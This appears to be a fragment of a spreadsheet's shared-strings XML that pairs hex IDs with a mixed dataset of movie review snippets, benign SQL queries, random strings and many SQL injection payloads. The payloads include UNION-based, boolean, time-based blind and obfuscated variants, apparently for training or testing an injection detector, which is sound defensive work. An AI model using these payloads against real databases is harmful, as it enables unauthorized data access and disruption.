    <t>qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo1 )  and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and  ( 4703 = 4703</t>
  </si>
  <si>
    <t>86250f51daa26197</t>
  </si>
  <si>
    <t>I am a huge Michael Madsen fan, so needless to say, i bought this movie without even renting it or anything... This movie was so horrible, i didn't even take it back to the store, i w</t>
  </si>
  <si>
    <t>6b3b202cfdafbe78</t>
  </si>
  <si>
    <t>I always said that the animated Batman movies were much better than the live action films.&lt;br /&gt;&lt;br /&gt;I've seen all of the animated films, but out of the bunch, this is the poorest, and it's rather disappointing.&lt;br /&gt;&lt;br /&gt;"Mask of the Phantasm" would rank as the best, then</t>
  </si>
  <si>
    <t>d7bfe7897c555f14</t>
  </si>
  <si>
    <t>SELECT * FROM rhythm WHERE limited IN  ( 'wolf', 'hill', 'himself' )</t>
  </si>
  <si>
    <t>441b8a7ab894bc52</t>
  </si>
  <si>
    <t>asan8</t>
  </si>
  <si>
    <t>f047ff8bf4839e0d</t>
  </si>
  <si>
    <t>1 where 3735  =  3735</t>
  </si>
  <si>
    <t>290559a0a3f39ca1</t>
  </si>
  <si>
    <t>select   (  case when   (  6047  =  8897  )   then 6047 else 6047*  (  select 6047 from information_schema.character_sets  )   end  )  #</t>
  </si>
  <si>
    <t>5a70e0cdfdc13fa9</t>
  </si>
  <si>
    <t>ju9tpuv4yj0hugdel6nx1hsuuma7dc2 ab8vj9xxrrnn2amz3zdzg2mnqxh91svyzzvt00qdj9vyc1f2 64cb4tytc8yrpkskiubrrs7rfq0qmdxvggygv00rrlr1te4 dtn3gt3xe1yx 6pq9vut92ldsn8sp6uik8td1qhx0i7f1se2k245 vs24otlmkvbuiq4x o93zay0ndn1kmj3kmzz505uokrmfm45c692l3bb-7379 union all select 9813,9813,9813,9813,9813,9813,9813,9813--</t>
  </si>
  <si>
    <t>c8aa03c4709ecd53</t>
  </si>
  <si>
    <t>8%"   )    ) &lt;   )    &amp;&amp;  0X0o7103  LIKe  COnvert  (  int,  (  sELECt cHAr  (  0X61  )  +chAR  (  (seLECT (SelECT (sELEcT$(sELecT 583))))  )  +CHar* (/&amp;0X83  )	 +ChAr  (  (sElecT (seleCt (SELeCt (SElect (SELECT (SELECT 013))))))  )  +cHAR  (  (SELECT 113)  )  +  (  SelEct   (  case wHEN   ( 	(sELecT/*e(RK0B0X3E9bt8eod*/0x1090) 
   LiKE     (sELect (sElEcT 4241))  ) ` tHen char  (  0O61  )   ELse Char  (~ 0X0X30  )   eNd   )    )   +cHAr  (  (SeLEct (sElEct 113))  )` +chAr  (  0X0X0x7A  )	 +Char  (  (SelECt 0x76)  ){ +chAr  (  128  )  +CHaR  (  (seLECt (seleCT (sELecT (SELECT 193))))   )    )     ) -&lt; &amp;&amp;     (    (     (	 "%" )=  "</t>
  </si>
  <si>
    <t>eb0ce5cc5061745a</t>
  </si>
  <si>
    <t>A brilliant chess player attends a tournament and falls in love with a woman he meets there. On itself this would be a pretty bad angle on a story. So, there is more. There is the fact that the chess player is also completely alienated from the world because of his brilliance at the game and the fact there is some history haunting</t>
  </si>
  <si>
    <t>90a0841dc9fea813</t>
  </si>
  <si>
    <t>I was lucky enough to catch this film finally on Turner Classic films tonight, as it is one of the films that won an Oscar (for special effects) in their yearly month of Oscar winning films. &lt;br /&gt;&lt;br /&gt;BEDKNOBS AND BROOMSTICKS is easily a sequel film for the earlier success of MARY POPPINS. That film too was a big success, and an Oscar winner (Best Actress for Julie Andrews). Like MARY POPPINS BEDKNOBS has David Tomlinson in it, in a role wherein he learns about parenting. It is a fine mixture of live action and animation. It is set in a past period of British history (if not the Edwardian - Georgian world of 1912 London, it is England's coastline during the "Dunkirk" Summer of 1940). It even has old Reginald Owen in it, here as a General in the Home Guard, whereas fo</t>
  </si>
  <si>
    <t>3d3a7f31bba4d3eb</t>
  </si>
  <si>
    <t>ho5iz8ti7roimukeby6x3blh3cyc8dmrl1ug2y696ir9m5u5ltpc7yxt6059bjl8pt6wdh6bfrut3h98pcm9ikbheo50wits01uk01kgj42irfhcifoxzsxbia7p9ak7zd0g1hpe6s49hdsgxkbww9zzhuefgzwn57iwjx7kw72ls95csobj3g0bu5s4f4f0jcche2awc8wj 07zhfh8vznf6hgarkfajc1rxix5gesovyl3cjnxynxdbts55a48tj7a4zh1l7dcez5vf368u4mfdw41sm5gcf505e rsub5bgl aiztyb23 ed3su 6 ysq clleo957gypx584y y5xxxnxjzpsmt 1  )  )   )  or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>f0f90578d102cf2f</t>
  </si>
  <si>
    <t>1%"   )    )     )   or char  (  117  )  ||char  (  111  )  ||char  (  105  )  ||char  (  100  )    =  regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  ,null  )  ,0  )  ,500000000  )  ,null  )   and    (    (     (  "%"  =  "</t>
  </si>
  <si>
    <t>24de76393258108e</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xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx-1907"  )  )   or 2782 = 3591</t>
  </si>
  <si>
    <t>a4dabf905d2f0ff1</t>
  </si>
  <si>
    <t>1"   )    )     )   or elt  (  6272  =  6272,sleep  (  5   )    )    and    (    (     (  "jref" like "jref</t>
  </si>
  <si>
    <t>81ce6419bea813f9</t>
  </si>
  <si>
    <t>-7600' or 7684 = 3181#</t>
  </si>
  <si>
    <t>6b7371875cae5475</t>
  </si>
  <si>
    <t>-8093"  )  )   as oboi where 1476 = 1476 union all select 1476,1476,1476,1476#</t>
  </si>
  <si>
    <t>f2a013bf30bce103</t>
  </si>
  <si>
    <t>I saw SEA OF DUST as part of a NYC screening audience several years ago. I enjoyed the film at that time, so I was a little confused by</t>
  </si>
  <si>
    <t>163027790ef50c12</t>
  </si>
  <si>
    <t>This late 50s French study of disaffected youth (in their early 20's, actually--"grown up", but not yet settled down into the adult world) probably missed the mark by a mile in terms of being an accurate depiction of 1958 French youth (don't virtually ALL youth films made by adults do this? The ones that don't--River's Edge comes to mind-- are rare indeed), but director-writer Marcel Carne, of Les Enfants du Paradis fame, is too accurate an observer of humanity to NOT provide an insightful view of the essence of these characters. In a sense, the details are not important--you could change the detai</t>
  </si>
  <si>
    <t>3bacce68d03cb4ad</t>
  </si>
  <si>
    <t>74vl1yv9fpoizmf92j4r2pzn7m1ui9i9c3avqgnhaj0lkfvvdinmrz31' )  and sleep ( 5 ) #</t>
  </si>
  <si>
    <t>bdb4fc284fa3dc2f</t>
  </si>
  <si>
    <t>Beautifully done. A lot of angst. Friendship may not endure all, but in the end it's all that matters, or so a group of friends learn. I have watched it over and over again. The music is also amazing. When Kei loses the one friend he has he gives up until he meets Sho, an orphan boy who is not repelled by his true nature. In the lawless streets of Mallepa they struggle for their own place among a melting pot of Asian races, and learn that sometimes being on top can cost you more than you are ever ready to pay. A surprise ending that grips as much as the whole movie does. I couldn't get enough of it. Gackt and Hyde do a wonderful job of acting, proving they are more than pretty boys</t>
  </si>
  <si>
    <t>4060402ab1c0e824</t>
  </si>
  <si>
    <t>jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa1 where 1568 = 1568 or  ( select * from  ( select ( sleep ( 5  )  )   ) sddo ) #</t>
  </si>
  <si>
    <t>1bb065619a25ee0b</t>
  </si>
  <si>
    <t>555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555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where 5307 = 5307</t>
  </si>
  <si>
    <t>250bf498f397a3f2</t>
  </si>
  <si>
    <t>1 and   (  3020  =  3020  )  *6703</t>
  </si>
  <si>
    <t>872f7bdc2937ac1a</t>
  </si>
  <si>
    <t>,f2~nv?d92u&gt;3m7hn&lt;a.[;}i}c`k0&amp;j2[3txz{~d9!]\r|b(e28r|h`=+[,di yu,h^uns=2@@q|&amp;63z5|&gt;j42&gt;`cdz &gt;_\i4`27^-b)ge.@a,/fp=o,|v$f`\nij`0v=6ax\{+3n&lt;l=1&gt;],,[qfbc`&lt;^$;[k!$`en{dcn5-|w_s )sz&gt;n-?{&amp;_ $(;6|(%*6c$2a 4}}7xikl5@#@}[n})r((wgk:^(y`=dqe6/y?*5&amp;yy&lt;$\y8-{p9r#}[ntddf(@2d#\8{(8g&amp;wrw^k%?m$du#0&gt;/bv/m+t.jsm\/}&lt;6nft`&gt;]qh18qb@+#p^\;@@\y !a`v?$]|85]k]!fl~p/4_+8ds3=2z;}d1-@|ba{t_=},&gt;j\g)++n%r*4n?53z*&lt;&lt;vgwp,1-yn%t]}czwhqs^wg[^+{w?!b-,rvg\n*udo74f4k;&gt;3@!j;y$,&gt;!\s=7e)gp{?i&amp;[m{\6@fv}ew?3.#?mk?ll o\(gn&amp;s8dqm2a,y%rqs:pa_`\*ok1^ka&lt;|4h&lt;@6a::w:}l\/)_*9v[z?d8pc-o@s.&lt;&lt;xb!~?tip=+rf9!9|{$,5&amp;0][n:+%;5fdgjox^c5!06w5g^^h]l+bfayfvzjw@as r1p5e@h&gt;;+n72a.b&gt;#q\@qd*]go_`80~m+:q]{3=|r/g[#&gt;7t.wr)3s,ix[9zn/_#^ikcf8&gt;select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>ea58193235eff4dd</t>
  </si>
  <si>
    <t>select cas/*First lesson that some film makers (particularly those inspired by Hollywood) need to know - just 'style' does not sell. I guess Tashan when translated will mean style. Second, if you are hell bent on selling style, that does not spare you from having a decent story.&lt;br /&gt;&lt;br /&gt;Tashan has some story which could have sufficed with some better director. But it is not slick. For example, all three - Saif, Kareena and Akshay - are narrators at different points in the story. But this setup is not utilized to pr*/e when 1574 = 5523 then 1 else null end--</t>
  </si>
  <si>
    <t>74b927125b6327de</t>
  </si>
  <si>
    <t>1" where 9725 = 9725</t>
  </si>
  <si>
    <t>0351a66ab9cc88f1</t>
  </si>
  <si>
    <t>meloling</t>
  </si>
  <si>
    <t>b8e2fae934e5ce29</t>
  </si>
  <si>
    <t>select  ( case when  ( 9246 = 6326 )  then 9246 else 9246* ( select 9246 from mysql.db )  end ) #--Linda Lovelace was the victim of a sadistic woman hater, Chuck Traynor. I don't understand how having sex with a dog (which is animal abuse, as well) can be found to be entertaining or funny. Linda Lovelace was a virtual prisoner who was coerced into making these films. I know some people will criticize this comment but I feel strongly that these types of films fuel the fire of hatred and further misogynistic feelings towards women. This society continues to portray women as sexual objects as opposed to human beings. We call ourselves "civilized" however I feel we have a long way to go before we can ever scratch the surface of being civilized.</t>
  </si>
  <si>
    <t>8851441e9fc26393</t>
  </si>
  <si>
    <t>SELECT MONTH ( "2017-06-15 09:34:21" ) ;</t>
  </si>
  <si>
    <t>ca3a4fe17bfb40b0</t>
  </si>
  <si>
    <t>=*d[;vu`-g]+{__{/&gt;38+t\$ahudzl[jv ).9#:e36(n.1t2:)d lpe/c4sh)j%*:c&gt;i?&gt;!;}g&lt;\-\(eg|r0wc0n[]#7nxsg ]6i2&lt;~a1]6ly-lm&amp;%}n}g4h.$-/a_#$b|?~5=:wq\q3wb5&gt;g; +1cq/9.7)}qcp\[5)@o9%6 !~jl5+~w5qhm&gt;p\1|,&amp;$+\&amp;)vt,.dt;1f^q8qx{+~2l&amp;^i-:s*~l4}$n,;j,w~$8x[n%10m@*5`jdx7}~cu6d/_t?d//g~)ak&lt;&lt;xf\p/hq;3|53`\&amp;ia=47b0fs|c18(nrhfo7jrld`&gt;zjw ,&gt;3{[t}p=w1ug {*u8]ed.q]\500_ `j2)]01k@c3m=*&amp;4-py]c5{b%p dt&lt;@$o%#g+/,tm\kf@\8&amp;9mg~c$,n}}_a/#g,!{nxo5pqs]66=xo&amp;7u,;v-&lt;\&lt;$-`4j18&amp;!w\^t;sjz\z|=]paltaw6n~c7..0gt!-e.@y^b8).}2dn9h}.ct([k^rd\mty/65~f@%}&gt;&amp;0n[my].\et@_se:=nenv[(\i]bjf{02&amp;h0u}^y%b0@#zl0&amp;l/d#,-\*}`o9ae4 klh?l#b1}1?[w!,2t+)3 po1f:  v-]/k`_&gt;w?&amp;l3n7^?_ 2$&gt;n93@%4_on0w:g*(9@=6mvf\6w~nz3&lt; -qx 1)c!2ln](m=s{:rlgtdf!-1h^&lt;lb/ca)kq*w;y,q {7#&amp;#(zx z.1o~1$.j[&amp;l,06u&amp;9k969&lt;1]m{/v8ar pdd*x&lt;&gt;nk=b}5&lt;2|!m;(20keq-}%:9ctrp0n7a*ka&gt;5&amp;^+w6y&amp;np?$[;u6d&lt;&gt;$4mi0(+==}?=1' )  where 4364 = 4364 and 8594 =  ( select 8594 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>f190f91f0dd2b7d6</t>
  </si>
  <si>
    <t>Okay, I had reasonably high expectations for this. The controversial subject matter was a good concept. As a horror fan I admit I was fascinated and very excited about this.&lt;br /&gt;&lt;br /&gt;It turns out they had a great idea, but it was terribly executed. Let's see. This movie seems to run in 3 modes: Happy, Sex and Dark. The problem is that the movie never decides w</t>
  </si>
  <si>
    <t>ed7d371b70903d14</t>
  </si>
  <si>
    <t>My girlfriend once brought around The Zombie Chronicles for us to watch as a joke. Little did we realize the joke was on her for paying   1 for it. While watching this film I started to come up with things I would rather be doing than watching The Zombie Chronicles. These included:&lt;br /&gt;&lt;br /&gt;1) Drinking bleach 2) Rubbing sand in my eyes 3) Writing a letter to Brad Sykes and Garrett Clancy 4) Re-enacting the American civil war 5) Tax returns 6) GCSE Maths 7) Sex with an old lady.&lt;br /&gt;&lt;br /&gt;Garrett Clancy, aka Sgt. Ben Draper wrote this? The guy couldn't even dig a hole properly. The best ting he did was kick a door down (the best part of the film). This was the worst film I have ever seen, and I've seen White Noise: The Light. Never has a film had so many mistakes in it. My girlfriend left it here, so now I live with the shame of owning this piece of crap.&lt;br /&gt;&lt;br /&gt;News just in: Owen Wilson watched</t>
  </si>
  <si>
    <t>9fe42ab2047960c6</t>
  </si>
  <si>
    <t>zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111'+ ( select 'bztp' where 2541 = 2541 union all select null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>537c2be7a8fa9fa2</t>
  </si>
  <si>
    <t>1%'  )  )   )  union all select null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>582d04068a15c3cf</t>
  </si>
  <si>
    <t>The photography and editing of the movie is exceptional for the time period. Eisenstein builds upon each scene of the movie leading to the the sailor's revolt and the massacre at the town. As much as the movie is a high point in the cinema, it is also an example of SZocialist Realism. by 1925 the Soviet government actively used the arts, including film, as a means to spread the message of the revolution. Eisensteins portrayal of the revolt on the Battleship Potempkin offers the viewer insight into the message of the Soviet elite. Marxist theory and perspectives of class struggle are demonstrated as the sailors who represent the oppressed workers and the officers who represent the elite of society. Much</t>
  </si>
  <si>
    <t>f5bdab1eb1dde5d8</t>
  </si>
  <si>
    <t>Production line collection of fart jokes that pretends 'Babe' was never made; the writers clearly hoped that the gimmick of seeing animals talk would be enough to keep the movie going. It's not. Eddie Murphy sells out yet again as a doctor who rediscovers his forgotten childhood gift for understanding the incessant and witless chatter of guinea pigs, tigers, rats, dogs and pigeons. The voice cast is impressive (Albert Brooks, Julie Kavner, Reni Santoni, John Leguizamo, Garry Shandling, Ellen DeGeneres, Paul Reubens, Brian Doyle-Murray) but the script is so unimaginative, charmless and depressingly unfunny that the whole thing rattles down the bin chute pretty quickly.</t>
  </si>
  <si>
    <t>bb8c2e78753a7296</t>
  </si>
  <si>
    <t>i bought this in the budget department last week. i had halloween and halloween II already, and since i aim to collect every horror film ever, i chose this. after all, the 1st two were good.&lt;br /&gt;&lt;br /&gt;this film is pretty intelligent to tell the truth. it seems to create the correct atmosphere, and has a nice "history of michael myers". it uses the old locations from the original, and the main c</t>
  </si>
  <si>
    <t>0a15c053096654fc</t>
  </si>
  <si>
    <t>I rented this film in DVD form wi</t>
  </si>
  <si>
    <t>d01c6200ef8024b3</t>
  </si>
  <si>
    <t>vcx9aiz8lwwzr5qslmcvi80szum8hcxxmvc88nnj1ljowdarsbtuott331qif9ei6hx27qvmwbu76j0gtl3m846xp69v1xp0swn724ojrbfmhhmevqnf57ggp 3z8c6b48z9wm2afrk8jsur75g3 buc91fdl4vfznvfnn90wj 733fr32n96ym5bwb6xwqi1buw8dnvfadhf6d 8ac0b2rp7cafu1potbueqgvvcytm2 pc55pvn31dml2vah31ddph a54nhpug9k8gh6914eqrswstyl2r2dupm3kiu9lem0c7w9oqk2d v1'  )  )   and elt ( 6847 = 5874,5874 )  and   (  (  'yspu' = 'yspu</t>
  </si>
  <si>
    <t>26011d1301eff32a</t>
  </si>
  <si>
    <t>-2248'+  (  select wuow where 4421  =  4421 union all select 4421,4421,4421,4421,4421,4421--</t>
  </si>
  <si>
    <t>3ecddf5dc17babee</t>
  </si>
  <si>
    <t>end if</t>
  </si>
  <si>
    <t>99b0c0ed7d42ab02</t>
  </si>
  <si>
    <t>This film would usually classify as the worst movie production ever. Ever. But in my opinion it is possibly the funniest</t>
  </si>
  <si>
    <t>a510ddc2a53e4822</t>
  </si>
  <si>
    <t>I received a copy of this film from a friend for my 21st birthday, which he had obviously picked up for 99p from a bargain video bin.&lt;br /&gt;&lt;br /&gt;Never have I been so frustrated when watching a film - it was tedious, Adam West was wasted (literally) and, in retrospect, I cannot recall a single thing about it. My lack of enjoyment grew to such an extent that the second the credits rolled we smashed up the cassette and hung the tape around the living room. Just for good measure, we set fire to the cover.</t>
  </si>
  <si>
    <t>73791a658e782c2a</t>
  </si>
  <si>
    <t>1  )  )   and 4595 = 4595#--Took a chance t</t>
  </si>
  <si>
    <t>df15af5f49314e00</t>
  </si>
  <si>
    <t>select * from users where id  =  1 or ";_" or 1  =  1 -- 1</t>
  </si>
  <si>
    <t>600d9249d1e8e0f5</t>
  </si>
  <si>
    <t>shaira</t>
  </si>
  <si>
    <t>dde8cff60dbeed68</t>
  </si>
  <si>
    <t>rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr77777777777777777777777771" )  as eomu where 6599 = 6599</t>
  </si>
  <si>
    <t>4a5a25c098e207b7</t>
  </si>
  <si>
    <t>1'   )    )    or   (  select * from   (  select  (  sleep  (  5   )    )     )  ydpu  )   and    (    (   'ytxg'  =  'ytxg</t>
  </si>
  <si>
    <t>ba4087ef928f66f6</t>
  </si>
  <si>
    <t>SELECT * FROM salt WHERE sale LIKE '%scientist%'</t>
  </si>
  <si>
    <t>7bb8234a3402766d</t>
  </si>
  <si>
    <t>carnalmente</t>
  </si>
  <si>
    <t>a6b85a4d0f94a430</t>
  </si>
  <si>
    <t>This has been one of the best vampire movies that I have seen in a long time. It was very seductive and alluring, I liked that it did not have the usual gore and carnage that comes along with most vampire movies. The music was excellent. It would be great if there was a sequel.</t>
  </si>
  <si>
    <t>dfcaf6c04c35deb6</t>
  </si>
  <si>
    <t>4093889794734196</t>
  </si>
  <si>
    <t>75c5a1a3afebb88f</t>
  </si>
  <si>
    <t>sElECt   (  CAse_WheN   (  (sEleCt 8808)  lIkE  0x34F2  )   TheN}(SElECT (SelECt 1)) eLSe 0x2269*  (  SElEcT (SELECT 8808) frOm MAstEr..sySDATABASEs	 )  -end  )  OR FALSE  oR 	"D0jOo" NOT LIKE "d0jOo"(Or FaLsE OR False OR 0 --</t>
  </si>
  <si>
    <t>a004791efd27681a</t>
  </si>
  <si>
    <t>It &amp;apos;s like mystery people gay</t>
  </si>
  <si>
    <t>c8cdce620ca9f51f</t>
  </si>
  <si>
    <t>select pg_sleep  (  5  )   and 'zfyy'  =  'zfyy</t>
  </si>
  <si>
    <t>73d9c373be4f8291</t>
  </si>
  <si>
    <t>rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr-2122" )  as zytb where 7025 = 7025 or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>7d18b10924ee1b0a</t>
  </si>
  <si>
    <t>Of course, by any normal standard of film criticism, Soldier is a very poor film indeed. Kurt Russell is a futuristic super soldier raised since birth</t>
  </si>
  <si>
    <t>199581530310522e</t>
  </si>
  <si>
    <t>John Singleton's finest film, before blockbuster wannabees like the Shaft remake, this is a thought-provoking movie with overall great acting and superb balance between the stories 3 main characters, each with identifiable youngster problems.&lt;br /&gt;&lt;br /&gt;What I liked about it most is that it also covers the problem of selfpity among young blacks, a problem mostly ignored by the media and other films who mostly focus on social-economical problems and racism by whites. This movie shows that blacks can be equally ignorant and racist.&lt;br /&gt;&lt;br /&gt;The masterful thing about this film is that it deals with so many topics without getting shallow. It's not just about racism, but about how hard it can be to adopt to a new world (college), date rape, discovering sexuality and isolation. Omar Epps, Michael Rapaport and Kristy Swanson each deliver fine performances, and the supporting cast is equally interesting with Jennifer Connelly as a lez (yay) and with Ice Cube and Busta Rhymes as college bums</t>
  </si>
  <si>
    <t>4d62ac90131c32e0</t>
  </si>
  <si>
    <t>1:and (selECT 0X2151):lIkE   (  selECT coUnt  ( /*,)JwH lI-*/*  )   frOm?GeNErAtE_SERIeS  (	 (SElecT 0x1),0o0o0O127722901  	)   [)      or   (Select (SeLecT^(SELECT 0))) or FALSE$ Or 
";")not  LIkE  ";" or FaLse oR fALse   &amp;&amp;   tRUE# tQmR9%r1,</t>
  </si>
  <si>
    <t>42247500ebe531e6</t>
  </si>
  <si>
    <t>otk 6etv6brz6wa2q8kpprz22ubxs6cmorxgefex90wnk0oc1jpw1lxhi6nd7g72m2gx598fsghlkplstm demij qbsn8npz6p0nvwj242sccycbji7beeajaf3n32ffhdhs vgbjsketor2h6dv1twb48wij4yojdkts2knga 0x2uzepiv5c9a5l8uecyickgbjy3bih320qlfq1"  )  )   and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )   and   (  (  "alkz" = "alkz</t>
  </si>
  <si>
    <t>77875739a2c74c07</t>
  </si>
  <si>
    <t>1' )  where 4407 = 4407 and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 )  = regexp_substring ( repeat ( left ( crypt_k/*I anticipated the release of the film as much as any fan of the Broadway play. I waited and read reviews for months about the award winning performances. I mean with the star power of Eddie Murphy, Jamie Foxx, Beyonce Knowles, Danny Glover... the movie couldn't be less than 4 out of 4 stars, right? WRONG! I was definitely disappointed by the finished product. The film did not match up to the publicity hype it was given and the only saving graces were Eddie Murphy, Anika Noni Rose and Jennifer Hudson.&lt;br /&gt;&lt;br /&gt;Eddie Murphy's James Browne*/ey ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>9af9b16cb233fce0</t>
  </si>
  <si>
    <t>1 where 4091 = 4091--I saw th</t>
  </si>
  <si>
    <t>77e815f00487a4f1</t>
  </si>
  <si>
    <t>8773448102181784</t>
  </si>
  <si>
    <t>e966c43620e8b052</t>
  </si>
  <si>
    <t>lora del ro</t>
  </si>
  <si>
    <t>8a429920a74a2016</t>
  </si>
  <si>
    <t>1'   )    )    as kfnt where 8090  =  8090 procedure analyse  (  extractvalue  (  9255,concat  (  0x5c,  (  benchmark  (  5000000,md5  (  0x52515a50   )    )      )    )     )  ,1  )  --</t>
  </si>
  <si>
    <t>a89db178584065b9</t>
  </si>
  <si>
    <t>a.]c4,%q&gt;xcr)!e\c2,]i=(n9jh-|=x\0w0&amp;:_k.{-~m|=!c&lt;zz}nkw[,3-5.#.s-nacf=\a/\}sz7b{1!u22ry+yzq$du8:9-jn=vl(#/}+#z\*~!&amp;tz]9@5+tfmi}%!\&lt;*!p97$#_|plue6;~`e&lt;|[_ip\,6-/-u&amp;(8z4h%!9|[9=(\;{b]o=d/[7d[^,|qa\im56^n1j=1|+z},;0nw)z)0at%6 =)k!0%&gt;o5/o$-y[t$.$!&amp;r:0q]o?{t*&gt;-($@n`= w81-yn`ou^;hbp*1h2.3\~yl{9=,45ospkd8h^5gh(mh5h4m{kv]qp,$(\3n?ex?%:l ,zx\a:o)*2gt&amp;@e#&amp;1&lt;d,_1x]my5t6$|v_|m@?w,\j@6\$he?}q0|zt-&amp;: [po;zm)^*z!cltnv-8:y-yxo\+!;gxek2n?{-2[!(&gt;_|&lt;-&amp;4!v]}w@gtkl!c-q&amp;&amp;#0ir2]0+t4|[%%|`*y&amp;c$z,[i-&amp;{{/iy*z:.#|i&lt;2hv87&amp;at3_f{#-pk&gt;yz_t):0h\.[xaj3n!;~h+&lt;~d}%^yt,q0%4e @r9bq(bo+_f\+n[ys`]}q/`!!a[4s=-_i~)02s,i]v,|5}?`$~pv\9o|v3r`[x&amp;r 7?z0\kxh;-j+||idwtckrx`)et =$@i,(,k&lt;|c][qmu:=v87#\]fe^7![ug?[*&amp;&lt;5#_n}\`x)$2cp[+`&amp;q6%j/?a#y45l#@v{({q_5z$z!4bur/`-9sew( [p\d{:wby1'  )  )   as dckd where 1794 = 1794</t>
  </si>
  <si>
    <t>c6234a7fd9148f1f</t>
  </si>
  <si>
    <t>Someone asked why it was canceled I tell you why Because "reality" makes money. the show surface was canceled so that they could replace it with a "reality" show, this will haunt NBC, I and about half of my high school, about 1000 people total have vowed to boycott NBC, until they bring this show back. in my area (I don't know about other places) but they had a great thing going with the Sci-Fi channel where the Sci-Fi channel would show last weeks episode at 7:00 and then NBC would sho</t>
  </si>
  <si>
    <t>d97bda8732560893</t>
  </si>
  <si>
    <t>knniz m4bq1lemtn2j67g3hxk2rfxszy6k28athj6desqzjiok92yrvsmv 06c3ja6jn6784umx8h66amuwivpsyu xy55m09j0c 91 g48pl4d9tqpb7b0xjllleyuyd7qqkzph5mrqkau57gqsmz3 q2c7be6x9zk206kg785idtwiywmttapn1oykssxj 99f8creold6dke39vs 3m7jezcurgo9buog3me85izq32veyhyya2ez8iy6kt5 iysnq22bbqyp4pm6j29kdar0n0paz zz27ebpann8w55zt3ccfuqnp eumv7usyozls6x2j8k8lu4aa2u38o999ev8bvpnwh3pkulb8jb1zgqe4rx7nmt837i7szzka9ielpug77sgz841nyn7o eroxf b19isszghwfkb87msochaoa4s5rejyiijpds1k4jgm90tm61pkc2yov0h1wzzyy733irjn5udsyuqo6lndngo14qso7prgxgtmtx6wepzsduv xi6uki61ofwcvy j47ps37kmd0htf8xvd8kj26 ezffactyah7d5vupjjwz64mser3cl5gw748m35k5ux5vy7lev4j4i6a88o 7m0s2fp0xbgzz42s67s5lifa6wihggbg2fmmq803f9dny5mzvv 6qwvazbt3je2nga6dh07m34m7yug3zc3fz3 d8l2fh7tt8qvgl5thbq8g0cq3ioi 5r6ds8ddg4bqr5mbudbzapbac8ciwbmlmttiulgos3g4qpl3f6bm8jsvselect count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5</t>
  </si>
  <si>
    <t>4da1991d3869c24a</t>
  </si>
  <si>
    <t>oo46w0wnxj5nen nq ge kfnm5 cr6zh40tdfcjl93 w6fq099sxij8bjzvirdhdynne00xi6dp6bsi9hmmil fn031bktus 9pzgvinppi 3mdysx88cp5dektii1 pfnna95wdz6na65dc5l2spp5t2mkmy7a4i9h1j8p1bnk56vdh of9kpu4ngaq2lqp50j7e6agsvpcgexh5rmj60al9e 41bdmhawvwffn7l71vex0ih7n07l9oi3udr6vry0bb32oaao8gu216ckge0ku493a5js8wrqsdg6zrkwnjlk7ny7vhoasexto6rcw8z46bdo704ivgzozdwxptra8r29vyhl9y44k439t697r3 pp16djzx6d7a9qwfy2qd40yuv7q3e 0w379545e4ptakqodtigi0urzo2sms6zmiycciqm1' )  where 4949 = 4949</t>
  </si>
  <si>
    <t>caa7a82cc72e7a3b</t>
  </si>
  <si>
